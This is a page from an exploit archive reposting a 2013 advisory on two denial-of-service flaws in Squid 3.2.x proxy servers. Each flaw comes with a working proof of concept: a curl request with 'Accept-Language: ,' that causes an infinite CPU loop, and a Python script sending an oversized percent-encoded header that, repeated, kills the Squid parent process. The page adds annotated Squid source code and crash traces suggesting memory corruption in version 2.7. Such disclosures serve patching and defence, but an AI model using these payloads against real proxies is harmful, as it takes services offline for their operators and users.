首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Squid 3.x Denial Of Service
来源:vfocus.net 作者:AKAT-1 发布时间:2013-03-08  
################################################################
# DoS (loop, 100% cpu) strHdrAcptLangGetItem() at errorpage.cc #
################################################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# Versions: 3.2.5, 3.2.7 


  This error is only triggered when squid needs to generate an error page (for example backend node is not responding etc...)
  POC (request):
  -- cut --
  GET http://127.0.0.1:1/foo HTTP/1.1
  Accept-Language: ,
  -- cut --

  e.g : curl -H "Accept-Language: ," http://localhost:3129/

  Code:

    strHdrAcptLangGetItem is called with pos equals 0, therefore first branch
    in if (316 line) is taken, because xisspace(hdr[pos]) is false, then pos++
    is not executed (because hdr[0] is ','). In 335 line statement in while is
    also false because hdr[0] = ',', so whole loop body is omited. dt = lang,
    thus after assignment in 353 line *lang == '\0', so expression in if
    statement in 357 line is false. So next execution of while body (314 line),
    has got same preconditions as previous, thus it's infinite loop.

   312  bool strHdrAcptLangGetItem(const String &hdr, char *lang, int langLen, size_t &pos)
   313  {
   314      while (pos < hdr.size()) {
   315          char *dt = lang;

   316          if (!pos) {
   317              /* skip any initial whitespace. */
   318              while (pos < hdr.size() && xisspace(hdr[pos]))
   319                  ++pos;
   320          } else {
   321              // IFF we terminated the tag on whitespace or ';' we need to skip to the next ',' or end of header.
   322              while (pos < hdr.size() && hdr[pos] != ',')
   323                  ++pos;
   324              if (hdr[pos] == ',')
   325                  ++pos;
   326          }

   327          /*
   328           * Header value format:
   329           *  - sequence of whitespace delimited tags
   330           *  - each tag may suffix with ';'.* which we can ignore.
   331           *  - IFF a tag contains only two characters we can wildcard ANY translations matching: <it> '-'? .*
   332           *    with preference given to an exact match.
   333           */
   334          bool invalid_byte = false;
   335          while (pos < hdr.size() && hdr[pos] != ';' && hdr[pos] != ',' && !xisspace(hdr[pos]) && dt < (lang + (langLen -1)) ) {
   336              if (!invalid_byte) {
   337  #if USE_HTTP_VIOLATIONS
   338                  // if accepting violations we may as well accept some broken browsers
   339                  //  which may send us the right code, wrong ISO formatting.
   340                  if (hdr[pos] == '_')
   341                      *dt = '-';
   342                  else
   343  #endif
   344                      *dt = xtolower(hdr[pos]);
   345                  // valid codes only contain A-Z, hyphen (-) and *
   346                  if (*dt != '-' && *dt != '*' && (*dt < 'a' || *dt > 'z') )
   347                      invalid_byte = true;
   348                  else
   349                      ++dt; // move to next destination byte.
   350              }
   351              ++pos;
   352          }
   353          *dt = '\0'; // nul-terminated the filename content string before system use.
   354          ++dt;

   355          debugs(4, 9, HERE << "STATE: dt='" << dt << "', lang='" << lang << "', pos=" << pos << ", buf='" << ((pos < hdr.size()) ? hdr.substr(pos,hdr.size()) : "") << "'");

   356          /* if we found anything we might use, try it. */
   357          if (*lang != '\0' && !invalid_byte)
   358              return true;
   359      }
   360      return false;
   361  }

EOF

=========================================================================


##############################################################
# httpMakeVaryMark() header value 'value' (http.cc:603 line) #
##############################################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# Versions: 3.2.5

  It takes combination of a 5x requests and responses in less than 10 seconds to crash the parent:
  Request
  -- cut --
  #!/usr/bin/env python
  print 'GET /index.html HTTP/1.1'
  print 'Host: localhost'
  print 'X-HEADSHOT: ' + '%XX' * 19000
  print '\r\n\r\n'
  -- cut --

  Response
  -- cut --
  HTTP/1.1 200 OK
  Vary: X-HEADSHOT
  -- cut --

  Code:

  In function httpMakeVaryMark() header value 'value' (http.cc:603 line) of the request is
  passed to rfc1738_escape_part() (rfc1738.c: 145 line) function, which escapes in POC example
  percent signs. This mean that the single charachter in request is now triple in length
  (e.g. '%' is now '%25'), thus 'X-HEADSHOT' header leangth from POC is now 57000 + (19000*2).

  This causes the 'value' length to be greater than 65536 (String.cc: 198 line) and the assert
  is invoked, which kills the child. When child is killed the Kid::stop() is called, which
  increments the 'badFailures' counter (Kid.cc:57 line). If the counter is greater than 4,
  then hopeless() function is called (src/ipc/Kid.cc:75 line), which terminates the main
  process of squid (parent) with the following message:
  "Squid Parent: (squid-1) process 8308 will not be restarted due to repeated, frequent failures"

  src/http.cc:
  573 httpMakeVaryMark(HttpRequest * request, HttpReply const * reply)
  574 {
  575     String vary, hdr;
  576     const char *pos = NULL;
  577     const char *item;
  578     const char *value;
  579     int ilen;
  580     static String vstr;
  581
  582     vstr.clean();
  583     vary = reply->header.getList(HDR_VARY);
  584
  585     while (strListGetItem(&vary, ',', &item, &ilen, &pos)) {
  586         char *name = (char *)xmalloc(ilen + 1);
  587         xstrncpy(name, item, ilen + 1);
  588         Tolower(name);
  589
  590         if (strcmp(name, "*") == 0) {
  591             /* Can not handle "Vary: *" withtout ETag support */
  592             safe_free(name);
  593             vstr.clean();
  594             break;
  595         }
  596
  597         strListAdd(&vstr, name, ',');
  598         hdr = request->header.getByName(name);
  599         safe_free(name);
  600         value = hdr.termedBuf();
  601
  602         if (value) {
  603             value = rfc1738_escape_part(value);
  604             vstr.append("=\"", 2);
  605             vstr.append(value);
  606             vstr.append("\"", 1);
  607         }

  lib/rfc1738.c:
  143         /* Do the triplet encoding, or just copy the char */
  144         if (do_escape == 1) {
  145             (void) snprintf(dst, (bufsize-(dst-buf)), "%%%02X", (unsigned char) *src);
  146             dst += sizeof(char) * 2;
  147         } else {
  148             *dst = *src;
  149         }

  src/String.cc:
  186 String::append( char const *str, int len)
  187 {
  188     assert(this);
  189     assert(str && len >= 0);
  190
  191     PROF_start(StringAppend);
  192     if (len_ + len < size_) {
  193         strncat(buf_, str, len);
  194         len_ += len;
  195     } else {
  196         // Create a temporary string and absorb it later.
  197         String snew;
  198         assert(len_ + len < 65536); // otherwise snew.len_ overflows below
  199         snew.len_ = len_ + len;
  200         snew.allocBuffer(snew.len_ + 1);
  201
  202         if (len_)
  203             memcpy(snew.buf_, rawBuf(), len_);
  204
  205         if (len)
  206             memcpy(snew.buf_ + len_, str, len);
  207
  208         snew.buf_[snew.len_] = '\0';
  209
  210         absorb(snew);
  211     }
  212     PROF_stop(StringAppend);
  213 }

  src/ipc/Kid.cc:
  46 /// called when kid terminates, sets exiting status
  47 void Kid::stop(status_type exitStatus)
  48 {
  49     assert(running());
  50     assert(startTime != 0);
  51
  52     isRunning = false;
  53
  54     time_t stop_time;
  55     time(&stop_time);
  56     if ((stop_time - startTime) < fastFailureTimeLimit)
  57         ++badFailures;
  58     else
  59         badFailures = 0; // the failures are not "frequent" [any more]
  60
  61     status = exitStatus;
  62 }
  70 /// returns true if master process should restart this kid
  71 bool Kid::shouldRestart() const
  72 {
  73     return !(running() ||
  74              exitedHappy() ||
  75              hopeless() ||
  76              shutting_down ||
  77              signaled(SIGKILL) || // squid -k kill
  78              signaled(SIGINT) || // unexpected forced shutdown
  79              signaled(SIGTERM)); // unexpected forced shutdown
  80 }

  src/ipc/Kid.h:
  23     /// keep restarting until the number of bad failures exceed this limit
  24     enum { badFailureLimit = 4 };
  25
  26     /// slower start failures are not "frequent enough" to be counted as "bad"
  27     enum { fastFailureTimeLimit = 10 }; // seconds



# BONUS POINT ;-) 
# Well, we think that in squid 2.7.Stable9 this is not cought in assert... *cough*


  #3  0x00007f9fd8cead76 in malloc_printerr (action=3, str=0x7f9fd8dbfc14 "malloc(): memory corruption", ptr=<optimized out>) at malloc.c:6283
  #16 0x00000000004874df in httpMakeVaryMark (request=0x42cf1410, reply=0x37d7c10) at http.c:397
and 
  #3  0x00007ff741a56d76 in malloc_printerr (action=3, str=0x7ff741b2f228 "double free or corruption (out)", ptr=<optimized out>) at malloc.c:6283
  #9  0x00000000004874df in httpMakeVaryMark (request=0x1f2dd20, reply=0x2bf6a90) at http.c:397
and 
  #3  0x00007f090d3add76 in malloc_printerr (action=3, str=0x7f090d486270 "free(): corrupted unsorted chunks", ptr=<optimized out>) at malloc.c:6283
  #9  0x00000000004874df in httpMakeVaryMark (request=0x371daf50, reply=0x373883a0) at http.c:397
and 
  #3  0x00007f609df68d76 in malloc_printerr (action=3, str=0x7f609e0411b8 "free(): invalid next size (normal)", ptr=<optimized out>) at malloc.c:6283
  #9  0x0000000000487507 in httpMakeVaryMark (request=0x8c2d1df0, reply=0x8850c050) at http.c:398
EOF

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Varnish 2.1.5 / 3.0.3 Denial O
·ALLMediaServer 0.94 SEH Overfl
·Samsung TV Denial Of Service
·Firebird Relational Database C
·SIP Witch 0.7.4 Denial Of Serv
·SCADA 3S CoDeSys Gateway Serve
·Subversion 1.6.17 Denial Of Se
·VLC Player 2.0.x (.mp3) <= Mem
·Raspberry Pi rpi-update Local
·Windows Media Player 10.0.0.38
·Viscosity setuid-set Viscosity
·Ubuntu 12.10 64bit Local Root
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved